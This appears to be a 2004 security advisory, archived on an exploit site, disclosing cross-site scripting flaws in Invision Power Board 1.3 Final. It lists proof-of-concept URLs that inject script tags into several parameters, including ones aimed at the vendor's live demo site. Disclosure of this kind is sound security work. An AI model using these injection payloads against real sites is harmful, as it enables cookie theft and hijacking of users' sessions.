exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

invision13.txt

invision13.txt
Posted Mar 5, 2004
Authored by Rafel Ivgi | Site theinsider.deep-ice.com

Invision Power Board versions 1.3 Final is susceptible to a cross site scripting attack.

tags | exploit, xss
SHA-256 | 93d8939b30b06bd6edcf59474442458101779057deb1b80413667302d3c4d1bf

invision13.txt

Change Mirror Download
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Software: Invision Power Board
Vendor: http://www.invisionboard.com/
Versions: (U) v1.3 Final
Bug: Cross Site Scripting Vulnerabillity
Risk: Medium
Exploitation: Remote with browser
Date: 29 Feb 2004
Author: Rafel Ivgi, The-Insider
E-Mail: the_insider@mail.com
Web: http://theinsider.deep-ice.com

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1) Introduction
2) Bug
3) The Code

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===============
1) Introduction
===============

Invision Power Board is available under a yearly and lifetime purchase
option for both personal and commercial use, no catches, no "spyware",
no hidden costs anywhere.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

======
2) Bug
======

The Vulnerabillity is Cross Site Scripting.
The vulnerable form fields are "c","f","showtopic","showuser","username".
If an attacker will request the following url from the server:

http://<host>/?c='><script>alert(window.document.url)</script><plaintext>
Or
http://<host>/?showtopic='><script>alert(window.document.url)</script><plain
text>
Or
http://<host>/?act=SR&f='><script>alert(document.cookie)</script>
Or
http://<host>/?showuser='><script>alert(document.cookie)</script>
Or
http://<host>/index.php?act=Reg&CODE=2&coppa_user=0&UserName='><script>alert
(document.cookie)</script>


XSS appears and the server allows an attacker to inject & execute scripts.


In the words of securityfocus.com :
~~~~~~~~~~~~~~~~~~~~~~~~~~

If all of these circumstances are met, an attacker may be able to exploit
this issue
via a malicious link containing arbitrary HTML and script code as part of
the hostname.
When the malicious link is clicked by an unsuspecting user, the
attacker-supplied HTML
and script code will be executed by their web client. This will occur
because the server
will echo back the malicious hostname supplied in the client's request,
without sufficiently
escaping HTML and script code.

Attacks of this nature may make it possible for attackers to manipulate web
content or to
steal cookie-based authentication credentials. It may be possible to take
arbitrary actions as the victim user.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===========
3) The Code
===========

http://<host>/?c='><script>alert(window.document.url)</script><plaintext>
http://<host>/?showtopic='><script>alert(window.document.url)</script><plain
text>
http://<host>/?act=SR&f='><script>alert(document.cookie)</script>
http://<host>/?showuser='><script>alert(document.cookie)</script>
http://<host>/index.php?act=Reg&CODE=2&coppa_user=0&UserName='><script>alert
(document.cookie)</script>

Live Example:
http://demo.invisionboard.com/?c='><script>alert(window.document.url)</scrip
t><plaintext>
http://demo.invisionboard.com/?showtopic='><script>alert(window.document.url
)</script><plaintext>
http://demo.invisionboard.com/?act=SR&f='><script>alert(document.cookie)</sc
ript>
http://demo.invisionboard.com/?showuser='><script>alert(document.cookie)</sc
ript>
http://demo.invisionboard.com/index.php?act=Reg&CODE=2&coppa_user=0&UserName
='><script>alert(document.cookie)</script>

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

---
Rafel Ivgi, The-Insider - advisory#41.txt
http://theinsider.deep-ice.com

"Things that are unlikeable, are NOT impossible."
Login or Register to add favorites

File Archive:

November 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    16 Files
  • 2
    Nov 2nd
    17 Files
  • 3
    Nov 3rd
    17 Files
  • 4
    Nov 4th
    11 Files
  • 5
    Nov 5th
    0 Files
  • 6
    Nov 6th
    0 Files
  • 7
    Nov 7th
    3 Files
  • 8
    Nov 8th
    59 Files
  • 9
    Nov 9th
    12 Files
  • 10
    Nov 10th
    6 Files
  • 11
    Nov 11th
    11 Files
  • 12
    Nov 12th
    1 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    9 Files
  • 15
    Nov 15th
    33 Files
  • 16
    Nov 16th
    53 Files
  • 17
    Nov 17th
    11 Files
  • 18
    Nov 18th
    14 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    26 Files
  • 22
    Nov 22nd
    22 Files
  • 23
    Nov 23rd
    10 Files
  • 24
    Nov 24th
    9 Files
  • 25
    Nov 25th
    11 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    20 Files
  • 29
    Nov 29th
    9 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close